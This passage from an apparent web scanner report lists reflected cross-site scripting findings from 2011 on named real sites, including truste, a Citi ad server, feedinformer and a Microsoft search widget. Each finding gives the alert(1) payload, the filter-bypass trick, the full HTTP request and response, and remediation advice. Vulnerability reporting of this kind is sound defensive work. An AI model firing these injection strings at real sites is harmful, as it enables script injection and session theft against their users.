User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334320592/direct;wi.300;hi.250/01/6388366403?click=http://r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001040499/cstr=60538233=_4e248527,6388366403,783329^1040499^1183^0,1_/xsxdata=$XSXDATA/bnum=60538233/optn=64?trg=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:11:46 GMT
Content-Type: text/javascript
Connection: keep-alive
Server: Apache-Coyote/1.1
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 5459

if(typeof truste=="undefined"||!truste){window.log=function(){log.history=log.history||[];log.history.push(arguments);
if(this.console){console.log(Array.prototype.slice.call(arguments))}};var truste=
...[SNIP]...
png",icon_cam:"http://choices.truste.com/assets/adicon.png",icon_cam_daa:"http://choices.truste.com/assets/ad_choices_i.png",iconText:"",aid:"att01",pid:"mec01",zindex:"10002",cam:"2",cid:"0311m300x250df5d5<ScRiPt>alert(1)</ScRiPt>e9bb056ed84"};
var tecabaseurl="http://choices.truste.com/";truste.ca.bindingInitMap[te_clr1_att01cont1_bi.baseName]=0;
truste.ca.intInitMap[te_clr1_att01cont1_bi.baseName]=te_clr1_att01cont1_ib;truste.ca.addBind
...[SNIP]...

3.26. http://choices.truste.com/ca [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3bb57<ScRiPt>alert(1)</ScRiPt>7ebe76c2f2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=10002&plc=tr&3bb57<ScRiPt>alert(1)</ScRiPt>7ebe76c2f2c=1 HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334320592/direct;wi.300;hi.250/01/6388366403?click=http://r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001040499/cstr=60538233=_4e248527,6388366403,783329^1040499^1183^0,1_/xsxdata=$XSXDATA/bnum=60538233/optn=64?trg=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:12:41 GMT
Content-Type: text/javascript
Connection: keep-alive
Server: Apache-Coyote/1.1
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 5424

if(typeof truste=="undefined"||!truste){window.log=function(){log.history=log.history||[];log.history.push(arguments);
if(this.console){console.log(Array.prototype.slice.call(arguments))}};var truste=
...[SNIP]...
(e==0){truste.ca.bindingInitMap[c.baseName]=e+1;var d=document.createElement("script");d.src="http://choices.truste.com/ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=10002&plc=tr&3bb57<ScRiPt>alert(1)</ScRiPt>7ebe76c2f2c=1&js=2";
document.body.appendChild(d);var a=document.createElement("div");a.innerHTML=te_clr1_att01cont1_ib;var f=a.firstChild;
while(f&&f.nodeType==3){f=f.nextSibling}truste.ca.intMap[c.baseName]=f}}
...[SNIP]...

3.27. http://choices.truste.com/ca [plc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 62bfb<ScRiPt>alert(1)</ScRiPt>1c7f134caf1 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=10002&plc=tr62bfb<ScRiPt>alert(1)</ScRiPt>1c7f134caf1 HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334320592/direct;wi.300;hi.250/01/6388366403?click=http://r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001040499/cstr=60538233=_4e248527,6388366403,783329^1040499^1183^0,1_/xsxdata=$XSXDATA/bnum=60538233/optn=64?trg=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:12:28 GMT
Content-Type: text/javascript
Connection: keep-alive
Server: Apache-Coyote/1.1
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 5459

if(typeof truste=="undefined"||!truste){window.log=function(){log.history=log.history||[];log.history.push(arguments);
if(this.console){console.log(Array.prototype.slice.call(arguments))}};var truste=
...[SNIP]...
</div>\n\n';
var te_clr1_att01cont1_bi={baseName:"te-clr1-att01cont1",anchName:"te-clr1-att01cont1-anch",width:300,height:250,ox:0,oy:0,plc:"tr62bfb<ScRiPt>alert(1)</ScRiPt>1c7f134caf1",iplc:"rel",intDivName:"te-clr1-att01cont1-itl",iconSpanId:"te-clr1-att01cont1-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att01cont1",noticeBaseUrl:"http://choices.truste.
...[SNIP]...

3.28. http://choices.truste.com/ca [zi parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload b2039<ScRiPt>alert(1)</ScRiPt>96dc5815b1f was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=10002b2039<ScRiPt>alert(1)</ScRiPt>96dc5815b1f&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334320592/direct;wi.300;hi.250/01/6388366403?click=http://r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001040499/cstr=60538233=_4e248527,6388366403,783329^1040499^1183^0,1_/xsxdata=$XSXDATA/bnum=60538233/optn=64?trg=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:12:10 GMT
Content-Type: text/javascript
Connection: keep-alive
Server: Apache-Coyote/1.1
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 5459

if(typeof truste=="undefined"||!truste){window.log=function(){log.history=log.history||[];log.history.push(arguments);
if(this.console){console.log(Array.prototype.slice.call(arguments))}};var truste=
...[SNIP]...
truste.com/assets/admarker.png",icon_cam:"http://choices.truste.com/assets/adicon.png",icon_cam_daa:"http://choices.truste.com/assets/ad_choices_i.png",iconText:"",aid:"att01",pid:"mec01",zindex:"10002b2039<ScRiPt>alert(1)</ScRiPt>96dc5815b1f",cam:"2",cid:"0311m300x250"};
var tecabaseurl="http://choices.truste.com/";truste.ca.bindingInitMap[te_clr1_att01cont1_bi.baseName]=0;
truste.ca.intInitMap[te_clr1_att01cont1_bi.baseName]=te_clr1_att0
...[SNIP]...

3.29. http://citi.bridgetrack.com/a/s/ [BT_PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /a/s/

Issue detail

The value of the BT_PID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9ab5c%3balert(1)//6c36bc080fa was submitted in the BT_PID parameter. This input was echoed as 9ab5c;alert(1)//6c36bc080fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/s/?BT_PID=2857809ab5c%3balert(1)//6c36bc080fa&BT_CON=1&BT_PM=1&r=0.6521653183735907&_u=visitor&_d=http://www.citi.com HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBT%5F9=VTIEML=0&VTI3PTY=&VTIPUB=705&VTITRF=42945&VTIPRC=0&VTICAT=0&VTISEG=0&VTIWAV=0&TX=1308597549&VTICON=0&VTIPRD=0&VTICHN=0&VTIVAR=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&VTIAS=0&VTILNK=0&SID=816F1D18DE4F4FD6AA3609CC099F2751&VTIVEN=1805; ASB18=TX=1310999261&Pb=3&A=8&SID=6EF947CD667D48E9889230E69F79EED5&Vn=194&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=101096&Cr=100991&W=54622&Tr=54622&Cp=5009&P=285777&B=18; ATV18=5921d1BROODc1c4SHc8N2Hc3c62c32JVc32N8cc1LAUc8ccc1LAUccccc; ASB9=TX=1310999261&Pb=3&A=8&SID=05504B672FAB48D2BDD435D2F63609B1&Vn=194&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=94295&Cr=93926&W=54614&Tr=54614&Cp=4519&P=285778&B=9; ATV9=24942d1BROODc1c4D7c8N2Ic3c62c2RN6c2S2Ncc1LAMc8ccc1LAMccccc; ATC9=6346d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0cccccccccd199P7Qcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd19IF0Vcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd19IF33cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd19IFATcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1ccccccccc; AdData=S3C=1&S1C=1&S2=93926z285778&S2T=201107181027410014&S1T=201107181027400899&S1=100991z285777&S3T=201107181027410656&S3=98930z285779&S2C=1; ATV1=61512d1BROOEc1c4NTc8N2Jc3c62c30JIc120Tcc19QFc8ccc19QFccccc; CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; ASB1=TX=1310999262&Pb=3&A=8&SID=5F11D94748094070B1511DC6879E889C&Vn=194&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=34845&Cr=98930&W=42831&Tr=42831&Cp=4861&P=285779&B=1; CitiBTSES=SID=E71BF466C1A64E6F871BFC50FF212EDE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Sun, 17 Jul 2011 14:27:47 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Thu, 12-Jul-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=E71BF466C1A64E6F871BFC50FF212EDE; path=/
Date: Mon, 18 Jul 2011 14:27:46 GMT
Connection: close
Content-Length: 58

var bt_ad_content2857809ab5c;alert(1)//6c36bc080fa=false;

3.30. http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /a/s/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f24ed"%3balert(1)//9904462d3ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f24ed";alert(1)//9904462d3ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/s/?BT_PID=285780&BT_CON=1&BT_PM=1&r=0.6521653183735907&_u=visitor&_d=http://www.citi.com&f24ed"%3balert(1)//9904462d3ab=1 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBT%5F9=VTIEML=0&VTI3PTY=&VTIPUB=705&VTITRF=42945&VTIPRC=0&VTICAT=0&VTISEG=0&VTIWAV=0&TX=1308597549&VTICON=0&VTIPRD=0&VTICHN=0&VTIVAR=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&VTIAS=0&VTILNK=0&SID=816F1D18DE4F4FD6AA3609CC099F2751&VTIVEN=1805; ASB18=TX=1310999261&Pb=3&A=8&SID=6EF947CD667D48E9889230E69F79EED5&Vn=194&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=101096&Cr=100991&W=54622&Tr=54622&Cp=5009&P=285777&B=18; ATV18=5921d1BROODc1c4SHc8N2Hc3c62c32JVc32N8cc1LAUc8ccc1LAUccccc; ASB9=TX=1310999261&Pb=3&A=8&SID=05504B672FAB48D2BDD435D2F63609B1&Vn=194&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=94295&Cr=93926&W=54614&Tr=54614&Cp=4519&P=285778&B=9; ATV9=24942d1BROODc1c4D7c8N2Ic3c62c2RN6c2S2Ncc1LAMc8ccc1LAMccccc; ATC9=6346d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0cccccccccd199P7Qcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd19IF0Vcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd19IF33cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd19IFATcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1ccccccccc; AdData=S3C=1&S1C=1&S2=93926z285778&S2T=201107181027410014&S1T=201107181027400899&S1=100991z285777&S3T=201107181027410656&S3=98930z285779&S2C=1; ATV1=61512d1BROOEc1c4NTc8N2Jc3c62c30JIc120Tcc19QFc8ccc19QFccccc; CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; ASB1=TX=1310999262&Pb=3&A=8&SID=5F11D94748094070B1511DC6879E889C&Vn=194&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=34845&Cr=98930&W=42831&Tr=42831&Cp=4861&P=285779&B=1; CitiBTSES=SID=E71BF466C1A64E6F871BFC50FF212EDE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Sun, 17 Jul 2011 14:27:51 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: AdData=S6C=1&S7=100969z285780&S7T=201107181027490155&S4T=201107181027510080&S3C=1&S4=99317z285780&S1C=3&S2=93926z285778&S2T=201107181027410014&S8C=1&S1T=201107181027500299&S1=100991z285777&S7C=1&S8=95350z285778&S8T=201107181027510293&S3T=201107181027410656&S3=98930z285779&S2C=1&S4C=2&S5=101161z285778&S5T=201107181027480734&S6T=201107181027490045&S6=101074z285779&S5C=1; expires=Fri, 16-Sep-2011 04:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Thu, 12-Jul-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=E71BF466C1A64E6F871BFC50FF212EDE; path=/
Date: Mon, 18 Jul 2011 14:27:50 GMT
Connection: close
Content-Length: 2091

var bt_ad_content285780=true;
function BTWrite(s) { document.write(s); }
function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack
...[SNIP]...
ts/99316/CBNA_218x88_ebills.jpg";var btbase=btf.substring(0, btf.lastIndexOf("/"))+"/";var lg="http://citi.bridgetrack.com/a/c/?BT_BCID=257373&BT_SID=105190&_u=visitor/_d=http%3A%2F%2Fwww%2Eciti%2Ecom/f24ed";alert(1)//9904462d3ab=1";var lf="lid=ILC-&clickTAG=http%3A%2F%2Fciti%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2FBT%5FBCID%3D257373%2FBT%5FSID%3D105190%2F%5Fu%3Dvisitor%2F%5Fd%3Dhttp%253A%252F%252Fwww%252Eciti%252Ecom%2
...[SNIP]...

3.31. http://feedinformer.com/search.php [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feedinformer.com
Path:   /search.php

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 531b6"><script>alert(1)</script>ededba709dd was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php?uid=feedinformer4e2460a020afd3.36023234&src=d531b6"><script>alert(1)</script>ededba709dd HTTP/1.1
Host: feedinformer.com
Proxy-Connection: keep-alive
Referer: http://feedinformer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=feedinformer4e2460a020afd3.36023234

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 16:34:44 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Vary: Accept-Encoding
Content-Length: 7669
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:la
...[SNIP]...
<input type="hidden" name="src" value="d531b6"><script>alert(1)</script>ededba709dd">
...[SNIP]...

3.32. http://feedinformer.com/search.php [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feedinformer.com
Path:   /search.php

Issue detail

The value of the uid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bde16"><script>alert(1)</script>aebb06e161b was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php?uid=feedinformer4e2460a020afd3.36023234bde16"><script>alert(1)</script>aebb06e161b&src=d HTTP/1.1
Host: feedinformer.com
Proxy-Connection: keep-alive
Referer: http://feedinformer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=feedinformer4e2460a020afd3.36023234

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 16:34:44 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Vary: Accept-Encoding
Content-Length: 7654
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:la
...[SNIP]...
<input type="hidden" name="uid" value="feedinformer4e2460a020afd3.36023234bde16"><script>alert(1)</script>aebb06e161b">
...[SNIP]...

3.33. http://feedinformer.com/tg.php [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feedinformer.com
Path:   /tg.php

Issue detail

The value of the uid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d147'%3balert(1)//edbb7d96a6b was submitted in the uid parameter. This input was echoed as 9d147';alert(1)//edbb7d96a6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tg.php?uid=feedinformer4e2460a020afd3.360232349d147'%3balert(1)//edbb7d96a6b&src=&cat=general&kw=&sc=general HTTP/1.1
Host: feedinformer.com
Proxy-Connection: keep-alive
Referer: http://feedinformer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=feedinformer4e2460a020afd3.36023234

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 16:34:44 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Vary: Accept-Encoding
Content-Length: 1787
Connection: close
Content-Type: text/html

<html>
<head>

<script type='text/javascript'><!--//<![CDATA[
function pop_ax() {
   if (--pop_cnt==0) {
       return;
   }
   var x=setTimeout('pop_ax()',750);
   var o=window.document.getElementById('p
...[SNIP]...
<im'+'g src="/track.php?uid=feedinformer4e2460a020afd3.360232349d147';alert(1)//edbb7d96a6b&d=feedinformer.com&sr='+sr+'" width=1 height=1>
...[SNIP]...

3.34. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1c423<img%20src%3da%20onerror%3dalert(1)>f43eef14872 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c423<img src=a onerror=alert(1)>f43eef14872 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&1c423<img%20src%3da%20onerror%3dalert(1)>f43eef14872=1 HTTP/1.1
Host: i1.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/security/cc297183.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; msdn=L=1033; mcI=Thu, 21 Jul 2011 12:52:07 GMT; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=ccc32296-e228-4717-9770-f152ea499ab9&Microsoft.CreationDate=07/18/2011 19:42:23&Microsoft.LastVisitDate=07/18/2011 19:46:45&Microsoft.NumberOfVisits=2&SessionCookie.Id=D3F156FE5E59413ECF79695756E37873; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:46:45&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=66&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=a7c04ce3fe1745ba9d34f1cfc103b2a7; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311007632265:ss=1311004920058

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: 6e8306a3bc4b2bd19dff62179bbaac82
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB36
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Tue, 19 Jul 2011 07:52:36 GMT
Date: Mon, 18 Jul 2011 19:52:36 GMT
Content-Length: 12973
Connection: close


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
